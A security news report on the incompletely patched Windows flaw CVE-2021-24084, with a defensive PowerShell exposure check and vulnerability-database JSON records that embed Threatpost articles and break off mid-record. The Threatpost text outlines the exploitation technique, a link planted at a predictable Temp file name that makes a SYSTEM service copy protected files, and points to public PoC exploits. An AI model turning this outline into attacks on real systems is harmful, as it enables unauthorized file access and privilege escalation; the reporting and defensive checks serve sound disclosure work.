Unofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.
Tracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.
Security researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.
But as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, the patch could be bypassed to achieve the same objective; this month the researcher further found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).
"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them," 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.
However, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on the C: drive and at least one local administrator account is set up on the computer.
Neither Windows Server nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted:
* Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates
* Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates
* Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates
* Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates
* Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates
* Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates
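The following exposure check is an added example, not code from THN or 0patch: it reports whether a host meets the three conditions the article lists (an affected Windows 10 build, system protection enabled on C:, and an enabled local administrator account). It assumes an elevated Windows PowerShell session on the host being assessed, the standard Windows 10 build-number-to-version mapping, and that restore points or a shadow copy of C: are an adequate proxy for "system protection enabled".

```powershell
# Exposure check for the CVE-2021-24084 LPE preconditions named in the article
# (added example; not THN's or 0patch's code). Assumes an elevated Windows
# PowerShell 5.1 session and the standard Windows 10 build-to-version mapping.

# Windows 10 releases the article lists as affected, keyed by OS build number.
$affectedBuilds = @{
    17763 = '1809'; 18362 = '1903'; 18363 = '1909'
    19041 = '2004'; 19042 = '20H2'; 19043 = '21H1'
}

$os       = Get-CimInstance -ClassName Win32_OperatingSystem
$build    = [int]$os.BuildNumber
$isServer = $os.ProductType -ne 1   # 1 = workstation; 2/3 = domain controller / server

$report = [ordered]@{}

# Condition 1: an affected Windows 10 build. Windows Server and Windows 11
# (build 22000 and later) are out of scope per the article.
if ($isServer) {
    $report.AffectedBuild = $false
    $report.OSNote        = "Windows Server build $build: not affected"
} elseif ($affectedBuilds.ContainsKey($build)) {
    $report.AffectedBuild = $true
    $report.OSNote        = "Windows 10 v$($affectedBuilds[$build]) (build $build)"
} else {
    $report.AffectedBuild = $false
    $report.OSNote        = "build $build is not in the affected list"
}

# Condition 2: system protection enabled on C:, approximated here (assumption)
# by the presence of restore points and of a shadow copy of the C: volume.
$cVolumeId     = (Get-CimInstance -ClassName Win32_Volume -Filter "DriveLetter='C:'").DeviceID
$restorePoints = @(Get-ComputerRestorePoint -ErrorAction SilentlyContinue)
$shadowsOnC    = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue |
                   Where-Object { $_.VolumeName -eq $cVolumeId })
$report.SystemProtectionOnC = ($restorePoints.Count -gt 0 -or $shadowsOnC.Count -gt 0)
$report.RestorePoints       = $restorePoints.Count
$report.ShadowCopiesOnC     = $shadowsOnC.Count

# Condition 3: at least one enabled, purely local (non-domain) user account
# that is a member of the built-in Administrators group.
$localAdmins = Get-LocalGroupMember -Group 'Administrators' |
    Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } |
    ForEach-Object { Get-LocalUser -SID $_.SID -ErrorAction SilentlyContinue } |
    Where-Object { $_.Enabled }
$report.EnabledLocalAdmins = @($localAdmins | Select-Object -ExpandProperty Name)

# Verdict: the escalation path the article describes needs all three together;
# a host missing any one of them is exposed only to the original file read.
$report.LPEPreconditionsMet = $report.AffectedBuild -and
                              $report.SystemProtectionOnC -and
                              ($report.EnabledLocalAdmins.Count -gt 0)

[pscustomobject]$report | Format-List
```

A host that reports all three conditions as true remains exposed until Microsoft's fix or the 0patch micropatch described in the article is applied; disabling a local administrator account or system protection changes the result but trades away the protection those features provide.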
CVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.
Then last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.
{"id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as 
[HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. 
Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-11-30T09:11:00", "modified": "2021-12-03T03:42:06", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9}, "severity": "MEDIUM", "exploitabilityScore": 3.9, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, 
"exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "immutableFields": [], "lastseen": "2022-05-09T12:37:52", "viewCount": 90, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"]}, {"type": "githubexploit", "idList": ["291894F9-38D4-5877-8B8F-EF46C6D23B82", "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12250", "KLA12259", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-34484", "MS:CVE-2021-41379"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", 
"SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_NOV_5007186.NASL", "SMB_NT_MS21_NOV_5007189.NASL", "SMB_NT_MS21_NOV_5007192.NASL", "SMB_NT_MS21_NOV_5007205.NASL", "SMB_NT_MS21_NOV_5007206.NASL", "SMB_NT_MS21_NOV_5007207.NASL", "SMB_NT_MS21_NOV_5007215.NASL", "SMB_NT_MS21_NOV_5007233.NASL", "SMB_NT_MS21_NOV_5007245.NASL", "SMB_NT_MS21_NOV_5007246.NASL", "SMB_NT_MS21_NOV_5007255.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "THREATPOST:E405927D7A8A492019D1B6552C396830"]}, {"type": "zdi", "idList": ["ZDI-21-1308", "ZDI-21-178", "ZDI-21-966"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-34484"]}, {"type": "githubexploit", "idList": ["3AA8003E-06D3-57B2-BB7E-43616295A4B7"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-34484"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", 
"SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "THREATPOST:E405927D7A8A492019D1B6552C396830"]}, {"type": "zdi", "idList": ["ZDI-21-178"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24084", "epss": "0.000440000", "percentile": "0.105180000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34484", "epss": "0.001340000", "percentile": "0.468400000", "modified": "2023-03-17"}, {"cve": "CVE-2021-41379", "epss": "0.955530000", "percentile": "0.989620000", "modified": "2023-03-18"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1659988328, "score": 1684013037, "epss": 1679165106}, "_internal": {"score_hash": "9d17a94d01f6911dbba4b1c2eabd2835"}}
{"threatpost": [{"lastseen": "2021-11-30T01:40:15", "description": "Attackers are actively exploiting a Windows Installer zero-day vulnerability that was discovered when a patch Microsoft issued for another security hole inadequately fixed the original and unrelated problem.\n\nOver the weekend, security researcher [Abdelhamid Naceri](<https://github.com/klinix5>) discovered a Windows Installer elevation-of-privilege vulnerability tracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) that Microsoft [patched](<https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/>) a couple of weeks ago as part of its November [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/>).\n\nHowever, after examining the fix, Naceri found a bypass as well as an even more concerning zero-day privilege-elevation bug. The researcher posted a [proof of concept (POC) exploit](<https://github.com/klinix5/InstallerFileTakeOver>) Tuesday on GitHub for the newly discovered bug that he said works on all currently-supported versions of Windows.\n\nIf exploited, the POC, called InstallerFileTakeOver, gives an actor administration privileges in Windows 10, Windows 11 and Windows Server when logged onto a Windows machine with Edge installed.\n\n## **Peer Research Confirms Exploit and Active Attacks**\n\nResearchers at Cisco Talos Security Intelligence and Research Group as well as others confirmed the POC can be reproduced as well as corroborating evidence that threat actors were already exploiting the bug.\n\n\u201cThis vulnerability affects every version of Microsoft Windows, including fully patched Windows 11 and Server 2022,\u201d according to a [post on the Cisco Talos blog](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) by\n\nJaeson Schultz, technical leader for Cisco Talos. 
\u201cTalos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability.\u201d\n\nOther researchers also confirmed on Twitter that the POC functions as advertised to deliver local privilege escalation.\n\n\u201cCan confirm this works, local priv esc,\u201d [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F>) security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog>), who said he tested it on Windows 10 20H2 and Windows 11. \u201cThe prior patch MS issued didn\u2019t fix the issue properly.\u201d\n\n## **Discovery and More Details**\n\nAs detailed by Microsoft, CVE-2021-41379 is a Windows Installer elevation of privilege vulnerability with a rating of low on the Common Vulnerability Scoring System.\n\n\u201cAn attacker would only be able to delete targeted files on a system,\u201d according to [Microsoft\u2019s notes](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) on the flaw. 
\u201cThey would not gain privileges to view or modify file contents.\u201d\n\nHowever, Microsoft\u2019s patch for the bug did not fix the vulnerability correctly, allowing Naceri to bypass it during his analysis of the patch, he said in his GitHub post of the POC.\n\nHowever, that bypass was small potatoes compared to a variant of CVE-2021-41379 that he discovered during his research that is \u201cmore powerful than the original one,\u201d which is why Naceri chose to publish a POC of that flaw instead, he wrote.\n\nThe code Naceri released leverages the discretionary access control list (DACL) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI file, allowing an attacker to run code as an administrator, Cisco Talos\u2019 Schultz explained in his post.\n\n## **Wait for the Patch**\n\nThe associated POC works in every supporting windows installation, including Windows 11 and Server 2022 with the November 2021 patch, as well as in server installations, Naceri wrote.\n\n\u201cWhile group policy by default doesn\u2019t allow standard users to do any MSI operation, the administrative install feature thing seems to be completely bypassing group policy,\u201d he wrote.\n\nDue to the \u201ccomplexity\u201d of the vulnerability, Naceri said that the best workaround available for the flaw at this time \u201cis to wait Microsoft to release a security patch.\n\n\u201cAny attempt to patch the binary directly will break Windows installer,\u201d he wrote, adding that those affected should \u201cwait and see how Microsoft will screw the patch again\u201d before taking any mitigation action.\n\nA Microsoft spokesperson told BleepingComputer that the company is aware of Naceri\u2019s disclosure and \u201cwill do what is necessary\u201d to keep customers \u201csafe and protected,\u201d according to [a published report](<https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/>).\n\n\u201cAn 
attacker using the methods described must already have access and the ability to run code on a target victim\u2019s machine,\u201d the spokesperson said, according to the report.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d an on-demand Town Hall with Eric Kaiser, Uptycs\u2019 senior security engineer, and find out how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ to access the on-demand event!_**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:09:18", "type": "threatpost", "title": "Attackers Actively Target Windows Installer Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-41379"], "modified": "2021-11-24T14:09:18", "id": "THREATPOST:E405927D7A8A492019D1B6552C396830", "href": "https://threatpost.com/attackers-target-windows-installer-bug/176558/", "cvss": {"score": 4.9, 
"vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-30T01:39:23", "description": "An unpatched Windows security vulnerability could allow information disclosure and local privilege escalation (LPE), researchers have warned. The issue (CVE-2021-24084) has yet to get an official fix, making it a zero-day bug \u2013 but a micropatch has been rolled out as a stop-gap measure.\n\nSecurity researcher Abdelhamid Naceri [originally reported](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) the vulnerability as an information-disclosure issue in October 2020, via Trend Micro\u2019s Zero-Day Initiative (ZDI). Though Microsoft had told him it was planning a fix for last April, the patch has not yet been forthcoming.\n\nThen, this month, Naceri discovered that CVE-2021-24084 could also be exploited for LPE, so that non-admin Windows users can read arbitrary files even if they do not have permissions to do so. In a proof-of-concept exploit, he demonstrated that it\u2019s possible to copy files from a chosen location into a Cabinet (.CAB) archive that the user can then open and read.\n\n> I mean this is still unpatched and allow LPE if shadow volume copies are enabled; \nBut I noticed that it doesn't work on windows 11 <https://t.co/HJcZ6ew8PO>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 15, 2021](<https://twitter.com/KLINIX5/status/1460338968780804098?ref_src=twsrc%5Etfw>)\n\nThe process for doing so is very similar to the [LPE exploitation approach](<https://www.hackingarticles.in/windows-privilege-escalation-hivenightmare/>) for the HiveNightmare bug, [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)**,** which affects the Security Accounts Manager (SAM) database in all versions of Windows 10. 
The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers.\n\n\u201cAs [HiveNightmare/SeriousSAM](<https://threatpost.com/win-10-serioussam/168034/>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\u201d Mitja Kolsek, head of the 0patch team, noted in a [recent posting](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>). \u201cWe confirmed this [for the zero-day and were] able to run code as local administrator.\u201d\n\n> It's still hilarious that this bug is still unpatched and fully functional on a windows 10 21H1 with october patch. <https://t.co/HO4Kwbql9z>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 2, 2021](<https://twitter.com/KLINIX5/status/1455500874596356098?ref_src=twsrc%5Etfw>)\n\n## **Windows 10 Bug Exploitation Details**\n\nSpecifically, the vulnerable functionality exists under the \u201caccess work or school\u201d settings, according to the opatch writeup. A normal user can make use of the \u201cexport your management log files\u201d function, which triggers the Device Management Enrollment Service.\n\n\u201cThis service first copies some log files to the C:\\ProgramData\\Microsoft\\MDMDiagnostics folder, and then packages them into a .CAB file whereby they\u2019re temporarily copied to C:\\Windows\\Temp folder,\u201d explained Kolsek. \u201cThe resulting .CAB file is then stored in the C:\\Users\\Public\\Public Documents\\MDMDiagnostics folder, where the user can freely access it.\u201d\n\nHowever, when the .CAB file is copied into the Windows Temp folder, a local attacker can pounce. 
The adversary would simply create a file shortcut link with a predictable file name that would normally be used in the normal export process, pointing to a target folder or file that the attacker would like to access.\n\n\u201cSince the Device Management Enrollment Service runs as Local System, it can read any system file that the attacker can\u2019t,\u201d Kolsek said.\n\nThere are two pre-requisites for achieving LPE, Kolsek noted.\n\n\u201cSystem protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters,\u201d he said. And, \u201cat least one local administrator account must be enabled on the computer, or at least one \u2018administrators\u2019 group member\u2019s credentials cached.\u201d\n\nTo address the issue, the free micropatch simply checks for the presence of short-cut links during the .CAB file creation.\n\n\u201cThe function we patched is CollectFileEntry inside mdmdiagnostics.dll. This is the function that copies files from C:\\Windows\\Temp folder into the .CAB file, and can be tricked into reading some other files instead,\u201d Kolsek explained. \u201cOur patch is placed immediately before the call to CopyFileW that opens the source file for copying, and uses the GetFinalPathNameByHandleW function to determine whether any junctions or other types of links are used in the path. 
If they are, our patch makes it look as it the CopyFileW call has failed, thereby silently bypassing the copying of any file that doesn\u2019t actually reside in C:\\Windows\\Temp.\u201d\n\nVulnerable versions of Windows include:\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nWindows Servers are not affected, and neither are Windows 11, Windows 10 v1803 and older Windows 10 versions.\n\nMicrosoft did not immediately return a request for comment on the timeline for an official patch.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T17:47:10", "type": "threatpost", "title": "Unpatched Windows 10 Zero-Day Allows Privileged File Access", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-36934"], 